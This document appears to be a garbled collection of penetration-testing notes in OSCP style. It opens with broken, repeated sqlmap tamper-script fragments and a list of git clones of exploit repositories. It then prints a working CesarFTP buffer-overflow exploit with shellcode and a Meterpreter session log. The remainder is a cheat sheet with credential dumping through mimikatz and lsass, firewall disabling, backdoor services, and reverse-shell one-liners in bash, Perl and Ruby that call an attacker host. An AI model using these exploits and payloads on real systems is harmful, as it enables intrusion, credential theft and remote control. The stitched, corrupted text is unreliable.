>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
'%S%E%L%E%C%T %F%I%E%L%D
>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
'%S%E%L%E%C%T %F%I%E%L%D
>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
'%S%E%L%E%C%T %F%I%E%L%D
>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
>>>'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM
DUAL')
>>> import random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>>import
>>> random.seed(0)
random
>>> random.seed(0)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
>>> tamper('1 AND 1=1')
"1 AND 1=1 and
>>> tamper('1 '0having'='0having'"
AND 9227=9227-- ')
>>> tamper('SELECT id sp_password'
'1 AND 9227=9227-- FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>>>>> tamper('1 AND
tamper('SELECT id 9227=9227')
FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>>
>>>tamper('SELECT
tamper('1 AND id FROM users')
9227=9227')
'1%23%0AAND%23%0A9227=9227'
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>>tamper('1
tamper('SELECT id FROM users')
AND 9227=9227')
'1--%0AAND--%0A9227=9227'
tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
>>> random.seed(0)
>>>>>>
tamper('SELECT
tamper("1 AND id FROM
'1'='1")users')
"1 %26%26 '1'='1"
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION AND
>>> tamper("1' SELECT'
1=1")
'1%bf%27-- '
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>>> tamper('insert')
'INSERT'
>> X-forwarded-for: TARGET_CACHESERVER_IP
(184.189.250.X)
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_US
>>> tamper('1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_US
git clone https://github.com/ngalongc/AutoLocalPrivilegeEscalation.git -
git clone https://github.com/AlessandroZ/BeRoot/releases.git -
git clone https://github.com/raffaele-forte/climber.git -
git clone https://github.com/gbonacini/CVE-2016-5195.git -
git clone https://github.com/ASRTeam/CVE-2016-5195.git -
git clone https://github.com/kasif-dekel/evilsudo.git -
git clone https://github.com/hfiref0x/UACME.git -
git clone https://github.com/Cn33liz/TpmInitUACBypass.git -
git clone https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC.gi -
git clone https://github.com/FuzzySecurity/PowerShell-Suite.git -
git clone https://github.com/FuzzySecurity/Unix-PrivEsc.git -
git clone https://github.com/byt3bl33d3r/CrackMapExec.git -
git clone https://github.com/foxglovesec/Potato.git -
git clone https://github.com/L3cr0f/DccwBypassUAC.git -
git clone https://github.com/enddo/awesome-windows-exploitation.git -
git clone https://github.com/1135/EquationExploit.git -
git clone https://github.com/xairy/kernel-exploits.git -
git clone https://github.com/clymb3r/Misc-Windows-Hacking.git -
git clone https://github.com/opsxcq/exploit-CVE-2017-7494.git -
git clone https://github.com/tresacton/exploits.git -
git clone https://github.com/offensive-security/exploit-database-bin-sploits.git -
git clone https://github.com/offensive-security/exploit-database.git -
git clone https://github.com/rlarabee/exploits.git -
git clone https://github.com/dyntopia/exploits.git -
git clone https://github.com/WindowsExploits/Exploits.git -
git clone https://github.com/SecWiki/linux-kernel-exploits.git -
git clone https://github.com/SecWiki/windows-kernel-exploits.git -
git clone https://github.com/edwardz246003/IIS_exploit.git -
git clone https://github.com/lochv/exploit/tree/master/ms17-010.git -
git clone https://github.com/ohnozzy/Exploit.git -
git clone https://github.com/huntcve/exploit.git -
git clone https://github.com/cloudsec/exploit.git -
git clone https://github.com/myjohnson062843/MS17-010.git -
git clone https://github.com/juansacco/exploitpack.git -
git clone https://github.com/saelo/cve-2014-0038.git -
git clone https://github.com/mazen160/struts-pwn.git -
git clone https://github.com/nixawk/labs.git -
git clone https://github.com/misterch0c/shadowbroker.git -
git clone https://github.com/x0rz/EQGRP_Lost_in_Translation.git -
git clone https://github.com/adamcaudill/EquationGroupLeak.git -
git clone https://github.com/XiphosResearch/exploits.git -
git clone https://github.com/abatchy17/WindowsExploits.git -
git clone https://github.com/AusJock/Privilege-Escalation.git -
ftp id: ftp:ftp find with debug machine

Get jmp esp:

view jmp_esp.png

create payload:

root@St0rn:~/Desktop# msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.23.10 LPORT=444 R | ms


[-] cmd/powershell_base64 failed: Encoding failed due to a bad character (index=245, char=0x2f)
[*] x86/shikata_ga_nai succeeded with size 120 (iteration=1)

buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"

Modify exploit:

#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [[email protected]]
#Date: 10.06.2006

from socket import *


import sys

buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"

def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str

host = sys.argv[1]
port = 21
user = "ftp"
password = "ftp"
EIP = 0x77fb59cc #JMP ESP from ntdll.dll

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))


print s.recv(1024)

s.send("pass %s\r\n" % (password))


print s.recv(1024)
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + buf
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

Create handler:

root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp


[*] Initializing modules...

LHOST => 192.168.23.10


LPORT => 444
PAYLOAD => windows/meterpreter/reverse_ord_tcp
[*] Started reverse handler on 192.168.23.10:444
[*] Starting the payload handler...

Launch exploit:

root@St0rn:~/exploit# python caesarftp.py 192.168.23.112


220 CesarFTP 0.99g Server Welcome !

331 User login OK, waiting for password

230 User password OK, CesarFTP server ready

len: 844
get a shell:

root@St0rn:~/Desktop# msfcli exploit/multi/handler LHOST=192.168.23.10 LPORT=444 PAYLOAD=windows/meterp


[*] Initializing modules...

LHOST => 192.168.23.10


LPORT => 444
PAYLOAD => windows/meterpreter/reverse_ord_tcp
[*] Started reverse handler on 192.168.23.10:444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (769536 bytes) to 192.168.23.111
[*] Meterpreter session 1 opened (192.168.23.10:444 -> 192.168.23.111:2824) at 2014-08-17 23:20:37 +0200

meterpreter >

get proof.txt:

meterpreter > shell


[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 544 created.
Channel 41 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\offsec>cd ../Administrator/Desktop


cd ../Administrator/Desktop

C:\Documents and Settings\Administrator\Desktop>dir


dir
Volume in drive C has no label.
Volume Serial Number is 5454-E9C1

Directory of C:\Documents and Settings\Administrator\Desktop

02/07/2011 05:10 PM <DIR> .


02/07/2011 05:10 PM <DIR> ..
08/25/2006 11:32 AM <DIR> Plugins
08/17/2014 11:23 PM 33 proof.txt
1 File(s) 33 bytes
3 Dir(s) 728,535,040 bytes free

C:\Documents and Settings\Administrator\Desktop>"C:\Documents and Settings\offsec\Desktop\Extras\nc.exe" 192.1


C:\Documents and Settings\offsec\Desktop\Extras\nc.exe 192.168.23.10 66 < proof.txt

C:\Documents and Settings\Administrator\Desktop>

On my machine:

root@St0rn:~/Desktop# nc -lvp 66 > proof.txt


listening on [any] 66 ...
192.168.23.112: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.23.10] from (UNKNOWN) [192.168.23.112] 3014
^C
root@St0rn:~/Desktop# cat proof.txt
33a84c00e939cc5bc0ced0b8b246ab3e

privilege escalation:

First create a job:

C:\Documents and Settings\offsec>at 16:44 /interactive cmd.exe


at 16:44 /interactive cmd.exe
Added a new job with job ID = 1

Change password of user1:

C:\Documents and Settings\offsec>net user user1 storn


net user user1 storn
The command completed successfully.

and connect to rdp:

see system_shell.png
168.23.10 LPORT=444 R | msfencode -b '\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c' -t python
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
PAYLOAD=windows/meterpreter/reverse_ord_tcp e

-17 23:20:37 +0200


Desktop\Extras\nc.exe" 192.168.23.10 66 < proof.txt
\x5c' -t python
# Site Reference:

https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tric

OSCP Handy Commands by sathisharthars

Nmap Full Web Vulnerable Scan:

mkdir /usr/share/nmap/scripts/vulscan

cd /usr/share/nmap/scrripts/vulscan

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse

nmap -sS -sV –script=vulscan/vulscan.nse target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV –script=vuln target

nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target

Dirb Directory Bruteforce:

dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt

Nikto Scanner:

nikto -C all -h http://IP

WordPress Scanner:

wpscan –url http://IP/ –enumerate p


Uniscan Scanning:

uniscan.pl -u target -qweds


HTTP Enumeration:

httprint -h http://www.example.com -s signatures.txt

SKIP Fish Scanner:

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Uniscan Scanning:

uniscan –u http://www.hubbardbrook.org –qweds

Here, -q – Enable Directory checks


-w – Enable File Checks
-e – Enable robots.txt and sitemap.xml check
-d – Enable Dynamic checks
-s – Enable Static checks

Skipfish Scanning:

m-time threads -LVY donot update after result

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Nmap Ports Scan:

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

2)fargement

3)data packed – like orginal one not scan packet

4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target

5) nmap –source-port 53 target


nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)

nmap -Pn -T2 -sV –randomize-hosts IP1,IP2

nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)

nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)

nmap -sA -PN -sN target

nmap -sS -sV -T5 -F -A -O target (version detection)

nmap -sU -v target (Udp)

nmap -sU -P0 (Udp)

nmap -sC 192.168.31.10-12 (all scan default)


Netcat Scanning:

nc -v -w 1 target -z 1-1000

for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done

US Scanning:

us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535

Unicornscan Scanning:

unicornscan X.X.X.X:a -r10000 -v

Kernel Scanning:

xprobe2 -v -p tcp:80:open 192.168.6.66


Samba Enumeartion:

nmblookup -A target

smbclient //MOUNT/share -I target -N

rpcclient -U “” target

enum4linux target

SNMP ENumeration:

snmpget -v 1 -c public IP version

snmpwalk -v 1 -c public IP

snmpbulkwalk -v 2 -c public IP

Windows Useful commands:

net localgroup Users

net localgroup Administrators

search dir/s *.doc

system(“start cmd.exe /k $cmd”)


sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore

/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits

C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

Plink Tunnel:

plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X

Enable RDP Access:

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

Turn Off Firewall:

netsh firewall set opmode disable


Meterpreter:

run getgui -u admin -p 1234

run vnc -p 5043

Add User Windows:

net user test 1234 /add

net localgroup administrators test /add

Mimikatz:

privilege::debug

sekurlsa::logonPasswords full

Passing the Hash:

pth-winexe -U hash //IP cmd


Password Cracking using Hashcat:

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat commands:

c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt

Banner Grabbing:

nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referrer: K0NSP1RACY.COM
<enter>
<enter>

window reverse shell:


c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
nc -lp 80

#nc -lp 31337 -e /bin/bash


nc 192.168.0.11 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

Find all SUID root files:

find / -user root -perm -4000 -print

Find all SGID root files:

find / -group root -perm -2000 -print

Find all SUID and SGID files owned by anyone:

find / -perm -4000 -o -perm -2000 -print

Find all files that are not owned by any user:


find / -nouser -print

Find all files that are not owned by any group:

find / -nogroup -print

Find all symlinks and what they point to:

find / -type l -ls

Python:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

python -m SimpleHTTPServer (Starting HTTP Server)

PID:

fuser -nv tcp 80 (list PID of process)

fuser -k -n tcp 80 (Kill Process of PID)


Hydra:

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling Exploit in Kali:

gcc -m32 -o output32 hello.c (32 bit)

gcc -o output hello.c (64 bit)

Compiling Windows Exploits on Kali:

cd /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe /tmp/exploit.c -lwsock32

wine ability.exe

NASM Command:
nasm -f bin -o payload.bin payload.asm

nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting:

ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

Pivoting to One Network to Another:

ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target


Pivoting Using metasploit:

route add 10.1.1.0 255.255.255.0 1

route add 10.2.2.0 255.255.255.0 1

use auxiliary/server/socks4a

run

proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

Exploit-DB search using CSV File:

searchsploit-rb –update

searchsploit-rb -t webapps -s WEBAPP

searchsploit-rb –search=”Linux Kernel”

searchsploit-rb -a “author name” -s “exploit name”

searchsploit-rb -t remote -s “exploit name”

searchsploit-rb -p linux -t local -s “exploit name”

For Privilege Escalation Exploit search:


cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe

msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x0

Create a Linux Reverse Meterpreter Binary

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfe

Create Reverse Shell (Shellcode)

msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b

Create a Reverse Shell Python Script

msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfe

Create a Reverse Bash Shell

msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh

Create a Reverse PHP Shell

msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php

Edit shell.php in a text editor to add <?php at the beginning.

Create a Windows Reverse Meterpreter Binary

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell

Security Commands In Linux:

find programs with a set uid bit

# find / -uid 0 -perm -4000


find things that are world writable

# find / -perm -o=w

find names with dots and spaces, there shouldn’t be any


# find / -name ” ” -print
# find / -name “..” -print
# find / -name “. ” -print
# find / -name ” ” -print

find files that are not owned by anyone


# find / -nouser

look for files that are unlinked

# lsof +L1

get information about procceses with open ports


# lsof -i

look for weird things in arp


# arp -a

look at all accounts including AD


# getent passwd
look at all groups and membership including AD

# getent group

list crontabs for all users including AD


# for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done

#generate random passwords


cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

# find all immutable files, there should not be any


find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

# fix immutable files


chattr -i file

Windows Buffer Overflow Exploitation Commands:

msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x0


COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20 For http request


\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
Useful Commands:

pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000


!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona\%p


!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest

SEH:

!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP):

!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)

ASLR:

!mona noaslr

EGG Hunter:

!mona jmp -r esp


!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’

GDB Debugger Commands:


Setting Breakpoint :

break *_start

Execute Next Instruction :


next
step
n
s

Continue Execution :

continue
c

Data :

checking ‘REGISTERS’ and ‘MEMORY’


Display Register Values : (Decimal , Binary , Hex )

print /d –> Decimal


print /t –> Binary
print /x –> Hex
O/P :

(gdb) print /d $eax

$17 = 13

(gdb) print /t $eax


$18 = 1101

(gdb) print /x $eax


$19 = 0xd
(gdb)

Display values of specific memory locations :


command : x/nyz (Examine)

n –> Number of fields to display ==>


y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
Cheat Codes:

Reverse Shellcode:

BASH:

bash -i >& /dev/tcp/192.168.23.10/443 0>&1

exec /bin/bash 0&0 2>&0


exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $l
exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1

PERL:

Shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdope

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdope

If the target system is running Windows use the following one-liner:

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ w

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ w

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockad


perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockad

RUBY:

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.r

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.r

If the target system is running Windows use the following one-liner:


ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’


PYTHON:

